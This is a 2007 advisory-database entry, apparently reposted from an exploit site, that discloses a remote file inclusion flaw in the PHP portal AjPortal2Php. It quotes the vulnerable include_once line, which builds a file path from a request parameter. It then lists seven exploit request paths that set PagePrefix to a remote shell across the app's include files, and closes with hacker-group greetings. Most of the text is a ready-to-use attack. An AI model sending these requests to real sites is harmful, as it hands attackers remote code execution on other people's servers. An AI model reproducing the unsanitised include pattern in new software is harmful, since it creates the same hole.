AjPortal2Php (PagePrefix) Remote File Inclusion Vulnerabilities

2007-04-19T00:00:00
ID SECURITYVULNS:DOC:16783
Type securityvulns
Reporter Securityvulns
Modified 2007-04-19T00:00:00

Description

[ AjPortal2Php]

Class: File Include Vulnerability

Remote: Yes

Site: http://www.ajlopez.com/downloads/AjPortal2Php.zip

Author: Alkomandoz Hacker

Contact: alkomandoz-hacker@hotmail.com

file ;

begin.inc.php connection.inc.php events.inc.php footer.inc.php header.inc.php menuleft.inc.php pages.inc.php

====================================================== Vuln Code

include_once($PagePrefix.'includes/configuration.inc.php');

======================================================= Exploit :

[AjPortal2Php _path]/includes/begin.inc.php?PagePrefix=Shell [AjPortal2Php _path]/includes/connection.inc.php?PagePrefix=Shell [AjPortal2Php _path]/includes/events.inc.php?PagePrefix=Shell [AjPortal2Php _path]/includes/footer.inc.php?PagePrefix=Shell [AjPortal2Php _path]/includes/header.inc.php?PagePrefix=Shell [AjPortal2Php _path]/includes/menuleft.inc.php?PagePrefix=Shell [AjPortal2Php _path]/includes/pages.inc.php?PagePrefix=Shell

---- Thanx: [HaCk.eGy] [Mahmood_ali] [Dr.aSiEr H@Ck] [ AsB-MaY GrOuPs ] [CiTy Of GhOsTs]

---- GreeTz: All www.Asb-May.Net & WwW.MoHaNdKo.CoM

milw0rm.com [2007-04-17]